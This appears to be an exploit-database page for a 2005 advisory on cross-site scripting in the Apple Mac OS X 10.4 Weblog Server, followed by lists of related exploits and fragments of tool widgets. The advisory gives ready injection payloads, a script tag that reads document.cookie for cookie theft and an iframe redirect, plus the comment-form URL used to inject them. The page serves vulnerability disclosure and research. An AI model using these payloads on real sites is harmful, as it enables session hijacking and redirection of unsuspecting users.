Menu

Search for hundreds of thousands of exploits

"Apple Mac OSX 10.4 Weblog Server - Cross-Site Scripting"

Author

Exploit author

"Donnie Werner"

Platform

Exploit platform

osx

Release date

Exploit published date

2005-08-15

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
source: https://www.securityfocus.com/bid/14569/info

Apple Mac OS X Weblog Server is prone to cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.

This issue was originally described in BID 14567 Apple Mac OS X Multiple Vulnerabilities. It is now being assigned its own BID. 

input malicious script into author and comment sections in
the comment option on the weblog.
eg:<SCRIPT>alert(document.cookie);</SCRIPT> [cookie theft]
eg:<iframe src="http://somesite.com"></iframe> [redirect]

http://www.example.com:16080/weblog/[bloguser]/?permalink=[blogentry]&comment=y&page=comments&category=%2F&author=[script]&authorEmail=&authorURL=&commentText=[script]&submit=Submit+Comment
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2019-02-11 "Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit)" remote osx Metasploit
2017-08-09 "NoMachine 5.3.9 - Local Privilege Escalation" local osx "Daniele Linguaglossa"
2017-07-15 "Apple Mac OS X + Safari - Local Javascript Quarantine Bypass" local osx "Filippo Cavallarin"
2017-05-01 "HideMyAss Pro VPN Client for OS X 2.2.7.0 - Local Privilege Escalation" local osx "Han Sahin"
2017-04-13 "GNS3 Mac OS-X 1.5.2 - 'ubridge' Local Privilege Escalation" local osx "Hacker Fantastic"
2017-02-01 "Apple WebKit - 'HTMLFormElement::reset()' Use-After Free" dos osx "Google Security Research"
2017-01-23 "Microsoft Remote Desktop Client for Mac 8.0.36 - Code Execution" local osx "Filippo Cavallarin"
2017-01-10 "Apple OS X Yosemite - 'flow_divert-heap-overflow' Kernel Panic" dos osx "Brandon Azad"
2016-12-16 "Horos 2.1.0 DICOM Medical Image Viewer - Denial of Service" dos osx LiquidWorm
2016-12-16 "Horos 2.1.0 Web Portal - Directory Traversal" remote osx LiquidWorm
Release Date Title Type Platform Author
2005-10-05 "TellMe 1.2 - Multiple Cross-Site Scripting Vulnerabilities" webapps php "Donnie Werner"
2005-08-21 "PerlDiver 2.31 - 'Perldiver.cgi' Cross-Site Scripting" webapps cgi "Donnie Werner"
2005-08-15 "Apple Mac OSX 10.4 Weblog Server - Cross-Site Scripting" remote osx "Donnie Werner"
2004-06-07 "NetWin Surgemail 1.8/1.9/2.0 / WebMail 3.1 - Login Form Cross-Site Scripting" webapps php "Donnie Werner"
2004-06-07 "NetWin Surgemail 1.8/1.9/2.0 / WebMail 3.1 - Error Message Full Path Disclosure" webapps php "Donnie Werner"
2003-10-20 "Caucho Resin 2.0/2.1 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities" webapps jsp "Donnie Werner"
2003-09-08 "ICQ 2003 - Webfront Guestbook Cross-Site Scripting" webapps asp "Donnie Werner"
2003-08-12 "Eudora WorldMail 2.0 - Search Cross-Site Scripting" webapps cgi "Donnie Werner" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected